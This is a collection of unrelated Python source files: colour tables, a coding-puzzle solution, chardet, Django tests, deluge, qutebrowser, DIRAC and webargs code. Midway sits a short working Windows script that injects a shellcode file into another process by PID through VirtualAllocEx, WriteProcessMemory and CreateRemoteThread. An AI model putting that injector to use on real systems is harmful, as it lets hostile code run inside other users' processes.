"#eee8aa", "palegreen": "#98fb98", "paleturquoise": "#afeeee", "palevioletred": "#db7093", "papayawhip": "#ffefd5", "peachpuff": "#ffdab9", "peru": "#cd853f", "pink": "#ffc0cb", "plum": "#dda0dd", "powderblue": "#b0e0e6", "purple": "#800080", "red": "#ff0000", "rosybrown": "#bc8f8f", "royalblue": "#4169e1", "saddlebrown": "#8b4513", "salmon": "#fa8072", "sandybrown": "#f4a460", "seagreen": "#2e8b57", "seashell": "#fff5ee", "sienna": "#a0522d", "silver": "#c0c0c0", "skyblue": "#87ceeb", "slateblue": "#6a5acd", "slategray": "#708090", "slategrey": "#708090", "snow": "#fffafa", "springgreen": "#00ff7f", "steelblue": "#4682b4", "tan": "#d2b48c", "teal": "#008080", "thistle": "#d8bfd8", "tomato": "#ff6347", "turquoise": "#40e0d0", "violet": "#ee82ee", "wheat": "#f5deb3", "white": "#ffffff", "whitesmoke": "#f5f5f5", "yellow": "#ffff00", "yellowgreen": "#9acd32", }
#!/bin/python """ Lisa just got a new math workbook. A workbook contains exercise problems, grouped into chapters. There are nn chapters in Lisa's workbook, numbered from 11 to nn. The ii-th chapter has titi problems, numbered from 11 to titi. Each page can hold up to kk problems. There are no empty pages or unnecessary spaces, so only the last page of a chapter may contain fewer than kk problems. Each new chapter starts on a new page, so a page will never contain problems from more than one chapter. The page number indexing starts at 11. Lisa believes a problem to be special if its index (within a chapter) is the same as the page number where it's located. Given the details for Lisa's workbook, can you count its number of special problems? Note: See the diagram in the Explanation section for more details. Input Format The first line contains two integers nn and kk — the number of chapters and the maximum number of problems per page respectively. The second line contains nn integers t1,t2,…,tnt1,t2,…,tn, where titi denotes the number of problems in the ii-th chapter. Constraints 1=<n,k,ti=<1001=<n,k,ti=<100 Output Format Print the number of special problems in Lisa's workbook. Sample Input 5 3 4 2 6 1 10 Sample Output 4 """ def spl_question(arr, n, k): prev_accum = cumm = tot_pg_num = ques = count = 0 for each_chptr in arr: # O(N) pgs, rem = divmod(each_chptr, k) ques = prev_accum = cumm = 0 for pg in xrange(pgs): tot_pg_num += 1 ques += k cumm = ques if prev_accum < tot_pg_num <= cumm: count += 1 prev_accum = cumm if rem: tot_pg_num += 1 ques += rem cumm = ques if prev_accum < tot_pg_num <= cumm: count += 1 return count if __name__ == "__main__": n, k = raw_input().strip("\n").split() n, k = int(n), int(k) arr = map(int, raw_input().strip("\n").split()) print spl_question(arr, n, k)
######################## BEGIN LICENSE BLOCK ######################## # The Original Code is mozilla.org code. # # The Initial Developer of the Original Code is # Netscape Communications Corporation. # Portions created by the Initial Developer are Copyright (C) 1998 # the Initial Developer. All Rights Reserved. # # Contributor(s): # Mark Pilgrim - port to Python # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### import sys from . import constants from .constants import eStart, eError, eItsMe from .charsetprober import CharSetProber from .codingstatemachine import CodingStateMachine from .mbcssm import UTF8SMModel ONE_CHAR_PROB = 0.5 class UTF8Prober(CharSetProber): def __init__(self): CharSetProber.__init__(self) self._mCodingSM = CodingStateMachine(UTF8SMModel) self.reset() def reset(self): CharSetProber.reset(self) self._mCodingSM.reset() self._mNumOfMBChar = 0 def get_charset_name(self): return "utf-8" def feed(self, aBuf): for c in aBuf: codingState = self._mCodingSM.next_state(c) if codingState == eError: self._mState = constants.eNotMe break elif codingState == eItsMe: self._mState = constants.eFoundIt break elif codingState == eStart: if self._mCodingSM.get_current_charlen() >= 2: self._mNumOfMBChar += 1 if self.get_state() == constants.eDetecting: if self.get_confidence() > constants.SHORTCUT_THRESHOLD: self._mState = constants.eFoundIt return self.get_state() def get_confidence(self): unlike = 0.99 if self._mNumOfMBChar < 6: for i in range(0, self._mNumOfMBChar): unlike = unlike * ONE_CHAR_PROB return 1.0 - unlike else: return unlike
from django.core.management import call_command import pytest import septentrion def test_showmigrations_command_override(mocker): mock_django_handle = mocker.patch( 'django.core.management.commands.showmigrations.Command.handle') mock_show_migrations = mocker.patch( 'septentrion.show_migrations', return_value=b'') call_command('showmigrations') assert mock_django_handle.called is False assert mock_show_migrations.called is True @pytest.mark.parametrize("manage", [True, False, None]) def test_north_manage_migrations(mocker, settings, manage): if manage is not None: settings.NORTH_MANAGE_DB = manage if manage is None and hasattr(settings, 'NORTH_MANAGE_DB'): del settings.NORTH_MANAGE_DB mock = mocker.patch('septentrion.show_migrations', return_value=b'') call_command('showmigrations') assert mock.called == bool(manage) def test_showmigrations_schema_not_inited(capsys, mocker): mock_version = mocker.patch( 'septentrion.db.get_current_schema_version') # schema not inited mock_version.return_value = None call_command('showmigrations') captured = capsys.readouterr() assert 'Current version is None' in captured.out def test_showmigrations_schema(capsys, mocker): # schema inited mock_version = mocker.patch( 'septentrion.db.get_current_schema_version') mock_version.return_value = septentrion.versions.Version.from_string('1.1') mock_plan = mocker.patch( 'septentrion.core.build_migration_plan') mock_plan.return_value = [ { 'version': "Version 1.2", 'plan': [ ('a-ddl.sql', True, '/somewhere/a-ddl.sql', False), ('b-ddl.sql', False, '/somewhere/b-ddl.sql', True), ] }, { 'version': "Version 1.3", 'plan': [ ('c-ddl.sql', False, '/somewhere/c-ddl.sql', False), ] } ] call_command('showmigrations') captured = capsys.readouterr() assert "Current version is 1.1" in captured.out assert "Target version is 1.3" in captured.out assert "Version 1.2" in captured.out assert "[X] \x1b[0ma-ddl.sql" in captured.out assert "[ ] \x1b[0mb-ddl.sql" in captured.out assert "Version 1.3" in captured.out assert "[ ] \x1b[0mc-ddl.sql" in captured.out
# -*- coding: utf-8 -*- from model.group import Group def test_add_group(app): old_groups = app.group.get_group_list() group = (Group(name="fdsasdaf", header="group", footer="group")) app.group.create(group) assert len(old_groups) + 1 == app.group.count() new_groups = app.group.get_group_list() old_groups.append(group) assert sorted(old_groups, key = Group.id_or_max) == sorted (new_groups,key = Group.id_or_max) #def test_add_empty_group(app): # old_groups = app.group.get_group_list() # group = (Group(name="", header="", footer="")) # app.group.create(group) # new_groups = app.group.get_group_list() # assert len(old_groups) + 1 == len(new_groups) # old_groups.append(group) # assert sorted(old_groups, key = Group.id_or_max) == sorted (new_groups,key = Group.id_or_max)
# coding=utf-8 __all__ = ['admin']
"""Script to display a collection of paths after inserting one new path Usage: add_to_a_path.py [-U] PATHS PATH add_to_a_path.py [-U] (-s | -i INDEX ) PATHS PATH Options: -h, --help Show this help and exit -v, --version Show version number and exit -s, --start Add the path at start of list of paths -i INDEX, --index=INDEX The index at which the path will be inserted Examples of use: $ export PATH=/bin:/usr/bin $ add_to_a_path.py PATH /usr/local/bin PATH=/bin:/usr/bin:/usr/local/bin $ add_to_a_path.py PATH /usr/local/bin --start PATH=/usr/local/bin:/bin:/usr/bin """ from __future__ import print_function import os import sys import argparse from bdb import BdbQuit __version__ = '0.1.0' class ScriptError(NotImplementedError): pass def version(): print('%s %s' % (args, __version__)) raise SystemExit def parse_args(): """Parse out command line arguments""" parser = argparse.ArgumentParser(description=__doc__.splitlines()[0]) parser.add_argument('symbol', help='The bash symbol to be changed') parser.add_argument('path', help='The path to be added') parser.add_argument('-s', '--start', action='store_true', help='Add the path at start of list of paths') parser.add_argument('-i', '--index', type=int, help='The index at which the path will be inserted') parser.add_argument('-v', '--version', action='store_true', help='Show version') args = parser.parse_args() if args.version: version() if not args.index: if args.start: args.index = 0 else: args.index = False return args def _add_symbol_to_paths(paths, symbol, i): if i is False: i = len(paths) result = paths[:] if not symbol: return result if symbol not in result: result.insert(i, symbol) return result j = result.index(symbol) if i != j: del result[j] result.insert(i, symbol) return result def get_arg_path(args): path = args.path if not path: return '' user_path = os.path.expanduser(path) real_path = os.path.realpath(user_path) if not os.path.isdir(real_path): return '' return real_path def split_paths(string): if not string: return [] return [p for p in string.split(os.path.pathsep) if p] def get_paths(args): symbol = args.symbol paths_string = '' if symbol in os.environ: paths_string = os.environ[symbol] elif os.path.pathsep in symbol: paths_string = symbol return split_paths(paths_string) def script(args): arg_path = get_arg_path(args) paths = get_paths(args) if not arg_path: if not paths: return False elif os.path.isdir(arg_path): if arg_path in paths: paths.remove(arg_path) paths = _add_symbol_to_paths(paths, arg_path, args.index) else: return False print('='.join((args.symbol, os.path.pathsep.join(paths)))) return True def main(): """Run the script""" try: args = parse_args() return os.EX_OK if script(args) else not os.EX_OK except (SystemExit, BdbQuit): pass return os.EX_OK if __name__ == '__main__': sys.exit(main())
from __future__ import absolute_import, division, print_function import _ast from jaspyx.context.block import BlockContext from jaspyx.visitor import BaseVisitor class IfElse(BaseVisitor): def visit_If(self, node, skip_indent=False): if not skip_indent: self.indent() self.output('if(') self.visit(node.test) self.output(') ') self.block(node.body, context=BlockContext(self.stack[-1])) if node.orelse: self.output(' else ') if len(node.orelse) == 1 and isinstance(node.orelse[0], _ast.If): self.visit_If(node.orelse[0], True) else: self.block(node.orelse, context=BlockContext(self.stack[-1])) self.output('\n') else: self.output('\n')
""" mock_django.signals ~~~~~~~~~~~~~~~~ :copyright: (c) 2012 DISQUS. :license: Apache License 2.0, see LICENSE for more details. """ import contextlib import mock @contextlib.contextmanager def mock_signal_receiver(signal, wraps=None, **kwargs): """ Temporarily attaches a receiver to the provided ``signal`` within the scope of the context manager. The mocked receiver is returned as the ``as`` target of the ``with`` statement. To have the mocked receiver wrap a callable, pass the callable as the ``wraps`` keyword argument. All other keyword arguments provided are passed through to the signal's ``connect`` method. >>> with mock_signal_receiver(post_save, sender=Model) as receiver: >>> Model.objects.create() >>> assert receiver.call_count = 1 """ if wraps is None: def wraps(*args, **kwrags): return None receiver = mock.Mock(wraps=wraps) signal.connect(receiver, **kwargs) yield receiver signal.disconnect(receiver)
from couchpotato.core.event import addEvent from couchpotato.core.logger import CPLog from couchpotato.core.notifications.base import Notification import os import subprocess log = CPLog(__name__) class Synoindex(Notification): index_path = '/usr/syno/bin/synoindex' def __init__(self): super(Synoindex, self).__init__() addEvent('renamer.after', self.addToLibrary) def addToLibrary(self, message = None, group = {}): if self.isDisabled(): return command = [self.index_path, '-A', group.get('destination_dir')] log.info('Executing synoindex command: %s ', command) try: p = subprocess.Popen(command, stdout = subprocess.PIPE, stderr = subprocess.STDOUT) out = p.communicate() log.info('Result from synoindex: %s', str(out)) return True except OSError, e: log.error('Unable to run synoindex: %s', e) return False return True def test(self, **kwargs): return { 'success': os.path.isfile(self.index_path) }
# -*- coding: utf-8 -*- # # deluge/ui/common.py # # Copyright (C) Damien Churchill 2008-2009 <[email protected]> # Copyright (C) Andrew Resch 2009 <[email protected]> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3, or (at your option) # any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, write to: # The Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor # Boston, MA 02110-1301, USA. # # In addition, as a special exception, the copyright holders give # permission to link the code of portions of this program with the OpenSSL # library. # You must obey the GNU General Public License in all respects for all of # the code used other than OpenSSL. If you modify file(s) with this # exception, you may extend this exception to your version of the file(s), # but you are not obligated to do so. If you do not wish to do so, delete # this exception statement from your version. If you delete this exception # statement from all source files in the program, then also delete it here. # # """ The ui common module contains methods and classes that are deemed useful for all the interfaces. """ import os import sys import urlparse import locale try: from hashlib import sha1 as sha except ImportError: from sha import sha from deluge import bencode from deluge.common import decode_string, path_join from deluge.log import LOG as log import deluge.configmanager class TorrentInfo(object): """ Collects information about a torrent file. :param filename: The path to the torrent :type filename: string """ def __init__(self, filename, filetree=1): # Get the torrent data from the torrent file try: log.debug("Attempting to open %s.", filename) self.__m_filedata = open(filename, "rb").read() self.__m_metadata = bencode.bdecode(self.__m_filedata) except Exception, e: log.warning("Unable to open %s: %s", filename, e) raise e self.__m_info_hash = sha(bencode.bencode(self.__m_metadata["info"])).hexdigest() # Get encoding from torrent file if available self.encoding = "UTF-8" if "encoding" in self.__m_metadata: self.encoding = self.__m_metadata["encoding"] elif "codepage" in self.__m_metadata: self.encoding = str(self.__m_metadata["codepage"]) # Check if 'name.utf-8' is in the torrent and if not try to decode the string # using the encoding found. if "name.utf-8" in self.__m_metadata["info"]: self.__m_name = decode_string(self.__m_metadata["info"]["name.utf-8"]) else: self.__m_name = decode_string(self.__m_metadata["info"]["name"], self.encoding) # Get list of files from torrent info paths = {} dirs = {} if self.__m_metadata["info"].has_key("files"): prefix = "" if len(self.__m_metadata["info"]["files"]) > 1: prefix = self.__m_name for index, f in enumerate(self.__m_metadata["info"]["files"]): if "path.utf-8" in f: path = os.path.join(prefix, *f["path.utf-8"]) else: path = decode_string(os.path.join(prefix, decode_string(os.path.join(*f["path"]), self.encoding)), self.encoding) f["index"] = index paths[path] = f dirname = os.path.dirname(path) while dirname: dirinfo = dirs.setdefault(dirname, {}) dirinfo["length"] = dirinfo.get("length", 0) + f["length"] dirname = os.path.dirname(dirname) if filetree == 2: def walk(path, item): if item["type"] == "dir": item.update(dirs[path]) else: item.update(paths[path]) item["download"] = True file_tree = FileTree2(paths.keys()) file_tree.walk(walk) else: def walk(path, item): if type(item) is dict: return item return [paths[path]["index"], paths[path]["length"], True] file_tree = FileTree(paths) file_tree.walk(walk) self.__m_files_tree = file_tree.get_tree() else: if filetree == 2: self.__m_files_tree = { "contents": { self.__m_name: { "type": "file", "index": 0, "length": self.__m_metadata["info"]["length"], "download": True } } } else: self.__m_files_tree = { self.__m_name: (0, self.__m_metadata["info"]["length"], True) } self.__m_files = [] if self.__m_metadata["info"].has_key("files"): prefix = "" if len(self.__m_metadata["info"]["files"]) > 1: prefix = self.__m_name for f in self.__m_metadata["info"]["files"]: if "path.utf-8" in f: path = os.path.join(prefix, *f["path.utf-8"]) else: path = decode_string(os.path.join(prefix, decode_string(os.path.join(*f["path"]), self.encoding)), self.encoding) self.__m_files.append({ 'path': path, 'size': f["length"], 'download': True }) else: self.__m_files.append({ "path": self.__m_name, "size": self.__m_metadata["info"]["length"], "download": True }) def as_dict(self, *keys): """ Return the torrent info as a dictionary, only including the passed in keys. :param keys: a number of key strings :type keys: string """ return dict([(key, getattr(self, key)) for key in keys]) @property def name(self): """ The name of the torrent. :rtype: string """ return self.__m_name @property def info_hash(self): """ The torrents info_hash :rtype: string """ return self.__m_info_hash @property def files(self): """ A list of the files that the torrent contains. :rtype: list """ return self.__m_files @property def files_tree(self): """ A dictionary based tree of the files. :: { "some_directory": { "some_file": (index, size, download) } } :rtype: dictionary """ return self.__m_files_tree @property def metadata(self): """ The torrents metadata. :rtype: dictionary """ return self.__m_metadata @property def filedata(self): """ The torrents file data. This will be the bencoded dictionary read from the torrent file. :rtype: string """ return self.__m_filedata class FileTree2(object): """ Converts a list of paths in to a file tree. :param paths: The paths to be converted :type paths: list """ def __init__(self, paths): self.tree = {"contents": {}, "type": "dir"} def get_parent(path): parent = self.tree while "/" in path: directory, path = path.split("/", 1) child = parent["contents"].get(directory) if child is None: parent["contents"][directory] = { "type": "dir", "contents": {} } parent = parent["contents"][directory] return parent, path for path in paths: if path[-1] == "/": path = path[:-1] parent, path = get_parent(path) parent["contents"][path] = { "type": "dir", "contents": {} } else: parent, path = get_parent(path) parent["contents"][path] = { "type": "file" } def get_tree(self): """ Return the tree. :returns: the file tree. :rtype: dictionary """ return self.tree def walk(self, callback): """ Walk through the file tree calling the callback function on each item contained. :param callback: The function to be used as a callback, it should have the signature func(item, path) where item is a `tuple` for a file and `dict` for a directory. :type callback: function """ def walk(directory, parent_path): for path in directory["contents"].keys(): full_path = path_join(parent_path, path) if directory["contents"][path]["type"] == "dir": directory["contents"][path] = callback(full_path, directory["contents"][path]) or \ directory["contents"][path] walk(directory["contents"][path], full_path) else: directory["contents"][path] = callback(full_path, directory["contents"][path]) or \ directory["contents"][path] walk(self.tree, "") def __str__(self): lines = [] def write(path, item): depth = path.count("/") path = os.path.basename(path) path = path + "/" if item["type"] == "dir" else path lines.append(" " * depth + path) self.walk(write) return "\n".join(lines) class FileTree(object): """ Convert a list of paths in a file tree. :param paths: The paths to be converted. :type paths: list """ def __init__(self, paths): self.tree = {} def get_parent(path): parent = self.tree while "/" in path: directory, path = path.split("/", 1) child = parent.get(directory) if child is None: parent[directory] = {} parent = parent[directory] return parent, path for path in paths: if path[-1] == "/": path = path[:-1] parent, path = get_parent(path) parent[path] = {} else: parent, path = get_parent(path) parent[path] = [] def get_tree(self): """ Return the tree, after first converting all file lists to a tuple. :returns: the file tree. :rtype: dictionary """ def to_tuple(path, item): if type(item) is dict: return item return tuple(item) self.walk(to_tuple) return self.tree def walk(self, callback): """ Walk through the file tree calling the callback function on each item contained. :param callback: The function to be used as a callback, it should have the signature func(item, path) where item is a `tuple` for a file and `dict` for a directory. :type callback: function """ def walk(directory, parent_path): for path in directory.keys(): full_path = os.path.join(parent_path, path) if type(directory[path]) is dict: directory[path] = callback(full_path, directory[path]) or \ directory[path] walk(directory[path], full_path) else: directory[path] = callback(full_path, directory[path]) or \ directory[path] walk(self.tree, "") def __str__(self): lines = [] def write(path, item): depth = path.count("/") path = os.path.basename(path) path = type(item) is dict and path + "/" or path lines.append(" " * depth + path) self.walk(write) return "\n".join(lines) def get_localhost_auth(): """ Grabs the localclient auth line from the 'auth' file and creates a localhost uri :returns: with the username and password to login as :rtype: tuple """ auth_file = deluge.configmanager.get_config_dir("auth") if os.path.exists(auth_file): for line in open(auth_file): if line.startswith("#"): # This is a comment line continue line = line.strip() try: lsplit = line.split(":") except Exception, e: log.error("Your auth file is malformed: %s", e) continue if len(lsplit) == 2: username, password = lsplit elif len(lsplit) == 3: username, password, level = lsplit else: log.error("Your auth file is malformed: Incorrect number of fields!") continue if username == "localclient": return (username, password) return ("", "")
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et: # Copyright 2015-2021 Florian Bruhin (The Compiler) <[email protected]> # # This file is part of qutebrowser. # # qutebrowser is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # qutebrowser is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with qutebrowser. If not, see <http://www.gnu.org/licenses/>. """A QProcess which shows notifications in the GUI.""" import locale import shlex from PyQt5.QtCore import (pyqtSlot, pyqtSignal, QObject, QProcess, QProcessEnvironment) from qutebrowser.utils import message, log, utils from qutebrowser.browser import qutescheme class GUIProcess(QObject): """An external process which shows notifications in the GUI. Args: cmd: The command which was started. args: A list of arguments which gets passed. verbose: Whether to show more messages. _output_messages: Show output as messages. _started: Whether the underlying process is started. _proc: The underlying QProcess. _what: What kind of thing is spawned (process/editor/userscript/...). Used in messages. Signals: error/finished/started signals proxied from QProcess. """ error = pyqtSignal(QProcess.ProcessError) finished = pyqtSignal(int, QProcess.ExitStatus) started = pyqtSignal() def __init__(self, what, *, verbose=False, additional_env=None, output_messages=False, parent=None): super().__init__(parent) self._what = what self.verbose = verbose self._output_messages = output_messages self._started = False self.cmd = None self.args = None self._proc = QProcess(self) self._proc.errorOccurred.connect(self._on_error) self._proc.errorOccurred.connect(self.error) self._proc.finished.connect(self._on_finished) self._proc.finished.connect(self.finished) self._proc.started.connect(self._on_started) self._proc.started.connect(self.started) if additional_env is not None: procenv = QProcessEnvironment.systemEnvironment() for k, v in additional_env.items(): procenv.insert(k, v) self._proc.setProcessEnvironment(procenv) @pyqtSlot(QProcess.ProcessError) def _on_error(self, error): """Show a message if there was an error while spawning.""" if error == QProcess.Crashed and not utils.is_windows: # Already handled via ExitStatus in _on_finished return msg = self._proc.errorString() message.error("Error while spawning {}: {}".format(self._what, msg)) @pyqtSlot(int, QProcess.ExitStatus) def _on_finished(self, code, status): """Show a message when the process finished.""" self._started = False log.procs.debug("Process finished with code {}, status {}.".format( code, status)) encoding = locale.getpreferredencoding(do_setlocale=False) stderr = self._proc.readAllStandardError().data().decode( encoding, 'replace') stdout = self._proc.readAllStandardOutput().data().decode( encoding, 'replace') if self._output_messages: if stdout: message.info(stdout.strip()) if stderr: message.error(stderr.strip()) if status == QProcess.CrashExit: exitinfo = "{} crashed.".format(self._what.capitalize()) message.error(exitinfo) elif status == QProcess.NormalExit and code == 0: exitinfo = "{} exited successfully.".format( self._what.capitalize()) if self.verbose: message.info(exitinfo) else: assert status == QProcess.NormalExit # We call this 'status' here as it makes more sense to the user - # it's actually 'code'. exitinfo = ("{} exited with status {}, see :messages for " "details.").format(self._what.capitalize(), code) message.error(exitinfo) if stdout: log.procs.error("Process stdout:\n" + stdout.strip()) if stderr: log.procs.error("Process stderr:\n" + stderr.strip()) qutescheme.spawn_output = self._spawn_format(exitinfo, stdout, stderr) def _spawn_format(self, exitinfo, stdout, stderr): """Produce a formatted string for spawn output.""" stdout = (stdout or "(No output)").strip() stderr = (stderr or "(No output)").strip() spawn_string = ("{}\n" "\nProcess stdout:\n {}" "\nProcess stderr:\n {}").format(exitinfo, stdout, stderr) return spawn_string @pyqtSlot() def _on_started(self): """Called when the process started successfully.""" log.procs.debug("Process started.") assert not self._started self._started = True def _pre_start(self, cmd, args): """Prepare starting of a QProcess.""" if self._started: raise ValueError("Trying to start a running QProcess!") self.cmd = cmd self.args = args fake_cmdline = ' '.join(shlex.quote(e) for e in [cmd] + list(args)) log.procs.debug("Executing: {}".format(fake_cmdline)) if self.verbose: message.info('Executing: ' + fake_cmdline) def start(self, cmd, args): """Convenience wrapper around QProcess::start.""" log.procs.debug("Starting process.") self._pre_start(cmd, args) self._proc.start(cmd, args) self._proc.closeWriteChannel() def start_detached(self, cmd, args): """Convenience wrapper around QProcess::startDetached.""" log.procs.debug("Starting detached.") self._pre_start(cmd, args) ok, _pid = self._proc.startDetached( cmd, args, None) # type: ignore[call-arg] if not ok: message.error("Error while spawning {}".format(self._what)) return False log.procs.debug("Process started.") self._started = True return True def exit_status(self): return self._proc.exitStatus()
#First parameter is path for binary file containing instructions to be injected #Second parameter is Process Identifier for process to be injected to import binascii import sys from ctypes import * if len(sys.argv) < 3: print("usage inject.py <shellcodefile.bin> <pid>") sys.exit(1) file = open(sys.argv[1],'rb') buff=file.read() file.close() print("buffer length = ") print(len(buff)) print("pid = "+sys.argv[2]) handle = windll.kernel32.OpenProcess(0x1f0fff,0, int(sys.argv[2])) if (handle == 0): print("handle == 0") sys.exit(1) addr = windll.kernel32.VirtualAllocEx(handle,0,len(buff),0x3000|0x1000,0x40) if(addr == 0): print("addr = = 0") sys.exit(1) bytes = c_ubyte() windll.kernel32.WriteProcessMemory(handle, addr , buff, len(buff), byref(bytes)) handle1=windll.kernel32.CreateRemoteThread(handle , 0x0, 0x0 , addr, 0x0,0x0 , 0x0) if(handle1 == 0): print("handle1 = = 0"); sys.exit(1) windll.kernel32.CloseHandle(handle)
""" The SGE TimeLeft utility interrogates the SGE batch system for the current CPU consumed, as well as its limit. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function __RCSID__ = "$Id$" import os import re import time import socket from DIRAC import S_OK, S_ERROR from DIRAC.Resources.Computing.BatchSystems.TimeLeft.TimeLeft import runCommand from DIRAC.Resources.Computing.BatchSystems.TimeLeft.ResourceUsage import ResourceUsage class SGEResourceUsage(ResourceUsage): """ This is the SGE plugin of the TimeLeft Utility """ def __init__(self): """Standard constructor""" super(SGEResourceUsage, self).__init__("SGE", "JOB_ID") self.queue = os.environ.get("QUEUE") sgePath = os.environ.get("SGE_BINARY_PATH") if sgePath: os.environ["PATH"] += ":" + sgePath self.log.verbose("JOB_ID=%s, QUEUE=%s" % (self.jobID, self.queue)) self.startTime = time.time() def getResourceUsage(self): """Returns S_OK with a dictionary containing the entries CPU, CPULimit, WallClock, WallClockLimit, and Unit for current slot. """ cmd = "qstat -f -j %s" % (self.jobID) result = runCommand(cmd) if not result["OK"]: return result cpu = None cpuLimit = None wallClock = None wallClockLimit = None lines = str(result["Value"]).split("\n") for line in lines: if re.search("usage.*cpu.*", line): match = re.search(r"cpu=([\d,:]*),", line) if match: cpuList = match.groups()[0].split(":") try: newcpu = 0.0 if len(cpuList) == 3: newcpu = float(cpuList[0]) * 3600 + float(cpuList[1]) * 60 + float(cpuList[2]) elif len(cpuList) == 4: newcpu = ( float(cpuList[0]) * 24 * 3600 + float(cpuList[1]) * 3600 + float(cpuList[2]) * 60 + float(cpuList[3]) ) if not cpu or newcpu > cpu: cpu = newcpu except ValueError: self.log.warn('Problem parsing "%s" for CPU consumed' % line) if re.search("hard resource_list.*cpu.*", line): match = re.search(r"_cpu=(\d*)", line) if match: cpuLimit = float(match.groups()[0]) match = re.search(r"_rt=(\d*)", line) if match: wallClockLimit = float(match.groups()[0]) else: self.log.warn("No hard limits found") # Some SGE batch systems apply CPU scaling factor to the CPU consumption figures if cpu: factor = _getCPUScalingFactor() if factor: cpu = cpu / factor consumed = {"CPU": cpu, "CPULimit": cpuLimit, "WallClock": wallClock, "WallClockLimit": wallClockLimit} if None in consumed.values(): missed = [key for key, val in consumed.items() if val is None] msg = "Could not determine parameter" self.log.warn("Could not determine parameter", ",".join(missed)) self.log.debug("This is the stdout from the batch system call\n%s" % (result["Value"])) else: self.log.debug("TimeLeft counters complete:", str(consumed)) if cpuLimit or wallClockLimit: # We have got a partial result from SGE if not cpuLimit: # Take some margin consumed["CPULimit"] = wallClockLimit * 0.8 if not wallClockLimit: consumed["WallClockLimit"] = cpuLimit / 0.8 if not cpu: consumed["CPU"] = time.time() - self.startTime if not wallClock: consumed["WallClock"] = time.time() - self.startTime self.log.debug("TimeLeft counters restored:", str(consumed)) return S_OK(consumed) else: msg = "Could not determine necessary parameters" self.log.info(msg, ":\nThis is the stdout from the batch system call\n%s" % (result["Value"])) retVal = S_ERROR(msg) retVal["Value"] = consumed return retVal def _getCPUScalingFactor(): host = socket.getfqdn() cmd = "qconf -se %s" % host result = runCommand(cmd) if not result["OK"]: return None lines = str(result["Value"]).split("\n") for line in lines: if re.search("usage_scaling", line): match = re.search(r"cpu=([\d,\.]*),", line) if match: return float(match.groups()[0]) return None
# -*- coding: utf-8 -*- """Field classes. Includes all fields from `marshmallow.fields` in addition to a custom `Nested` field and `DelimitedList`. All fields can optionally take a special `location` keyword argument, which tells webargs where to parse the request argument from. :: args = { 'active': fields.Bool(location='query') 'content_type': fields.Str(load_from='Content-Type', location='headers') } """ import marshmallow as ma from webargs.core import argmap2schema __all__ = [ 'Nested', 'DelimitedList', ] # Expose all fields from marshmallow.fields. # We do this instead of 'from marshmallow.fields import *' because webargs # has its own subclass of Nested for each in (field_name for field_name in ma.fields.__all__ if field_name != 'Nested'): __all__.append(each) globals()[each] = getattr(ma.fields, each) class Nested(ma.fields.Nested): """Same as `marshmallow.fields.Nested`, except can be passed a dictionary as the first argument, which will be converted to a `marshmallow.Schema`. """ def __init__(self, nested, *args, **kwargs): if isinstance(nested, dict): nested = argmap2schema(nested) super(Nested, self).__init__(nested, *args, **kwargs) class DelimitedList(ma.fields.List): """Same as `marshmallow.fields.List`, except can load from either a list or a delimited string (e.g. "foo,bar,baz"). :param Field cls_or_instance: A field class or instance. :param str delimiter: Delimiter between values. :param bool as_string: Dump values to string. """ delimiter = ',' def __init__(self, cls_or_instance, delimiter=None, as_string=False, **kwargs): self.delimiter = delimiter or self.delimiter self.as_string = as_string super(DelimitedList, self).__init__(cls_or_instance, **kwargs) def _serialize(self, value, attr, obj): ret = super(DelimitedList, self)._serialize(value, attr, obj) if self.as_string: return self.delimiter.join(format(each) for each in value) return ret def _deserialize(self, value, attr, data): try: ret = ( value if ma.utils.is_iterable_but_not_string(value) else value.split(self.delimiter) ) except AttributeError: self.fail('invalid') return super(DelimitedList, self)._deserialize(ret, attr, data)
# Name: undo.py # Purpose: XRC editor, undo/redo module # Author: Roman Rolinsky <[email protected]> # Created: 01.12.2002 # RCS-ID: $Id: undo.py 54812 2008-07-29 13:39:00Z ROL $ from globals import * import view from component import Manager from model import Model undo_depth = 10 # max number of undo remembered # Undo/redo classes class UndoManager: # Undo/redo stacks undo = [] redo = [] def RegisterUndo(self, undoObj): TRACE('RegisterUndo: %s', undoObj.label) self.undo.append(undoObj) while len(self.undo) > undo_depth: self.undo.pop(0) map(Undo.destroy, self.redo) self.redo = [] self.UpdateToolHelp() def GetUndoLabel(self): return self.undo[-1].label def GetRedoLabel(self): return self.redo[-1].label def Undo(self): undoObj = self.undo.pop() undoObj.undo() self.redo.append(undoObj) view.frame.SetStatusText('Undone') Presenter.setModified() self.UpdateToolHelp() def Redo(self): undoObj = self.redo.pop() undoObj.redo() self.undo.append(undoObj) view.frame.SetStatusText('Redone') Presenter.setModified() self.UpdateToolHelp() def Clear(self): map(Undo.destroy, self.undo) self.undo = [] map(Undo.destroy, self.redo) self.redo = [] self.UpdateToolHelp() def CanUndo(self): return bool(self.undo) def CanRedo(self): return bool(self.redo) def UpdateToolHelp(self): if g.undoMan.CanUndo(): msg = 'Undo ' + self.GetUndoLabel() view.frame.tb.SetToolShortHelp(wx.ID_UNDO, msg) view.frame.tb.SetToolLongHelp(wx.ID_UNDO, msg) if g.undoMan.CanRedo(): msg = 'Redo ' + self.GetRedoLabel() view.frame.tb.SetToolShortHelp(wx.ID_REDO, msg) 